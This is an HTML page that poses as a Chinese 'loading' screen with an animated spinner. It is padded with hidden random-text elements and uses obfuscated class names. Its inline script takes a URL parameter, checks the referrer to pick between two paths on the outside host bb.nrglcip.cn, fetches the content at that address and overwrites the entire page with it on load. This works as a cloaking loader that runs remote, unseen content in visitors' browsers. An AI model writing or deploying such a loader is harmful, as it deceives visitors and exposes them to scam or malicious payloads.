<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .BmhXJO {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .BmhXJO .J9yyU2XRNcQ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .BmhXJO .content {
            line-height: 50px;
            text-align: center
        }

        .BmhXJO .img {
            width: 100%
        }

        .BmhXJO .Io8UEvh5KgL {
            text-align: center
        }

        .BmhXJO .Io8UEvh5KgL span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .BmhXJO .Io8UEvh5KgL span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .BmhXJO .Io8UEvh5KgL span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .BmhXJO .Io8UEvh5KgL span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .BmhXJO .Io8UEvh5KgL span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .BmhXJO .Io8UEvh5KgL span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .BmhXJO .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function xWbjRkKOtNVr4(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Aai2w = xWbjRkKOtNVr4('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Aai2w +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Aai2w +".html?a=share";
		}
		
        rmRAbp=url+"#"+new Date().getTime();
        rmRAbp && function() {
            $.get(rmRAbp, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>qUhy0tddev7llGlfNYZ7Our6nzsgwsE6b2f6fyNyoH8GmLbApPpOj20gvdgLdET7Ukj</span>
<li style='display:none' >TT2l88yOfddIMgtx4tHNbrY8</li>
<div style='display:none'>kpQAn6kZ7Yc0rfniTB8srRY6dtUxgU18IfHsPzHn</div>
<ul style='display:none' >iN3rtpTEg5i1YJ21BIZONVh7xlzI2cK</ul>
<span style='display:none'>qUhy0tddev7llGlfNYZ7Our6nzsgwsE6b2f6fyNyoH8GmLbApPpOj20gvdgLdET7Ukj</span>
<p  style='display:none'>EG5rVF6bL9sOXvzfOlQRsA</p><div class="BmhXJO">
    <div class="J9yyU2XRNcQ">
        <div class="Io8UEvh5KgL">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >HVqRXH2JGwCuyG90jmikeJCh2YhtjSI4ZUDtQzbnGrCjT2hVDMkVqr69DxzQuZq32UBElYNWlGSx9NweXW46lXAWZ1bogs</b>
<ul style='display:none' >UcHdydrtKc5DakwZEzwHsISDUc33gM0QIIZSw5CzbcVcPxJUBBXrWqjeve2cKzglklSJpgm</ul>
<span style='display:none'>d8e60D2ZorRsTEwFq1xZPfEy9IqPyGPy9KMGGGZheqvRXLTKzUiSHTkQVi1sVMgG8dkjgzQZEvhAaupM2wkyZFFV8Ylg</span>
<span style='display:none'>d8e60D2ZorRsTEwFq1xZPfEy9IqPyGPy9KMGGGZheqvRXLTKzUiSHTkQVi1sVMgG8dkjgzQZEvhAaupM2wkyZFFV8Ylg</span></body>
</html>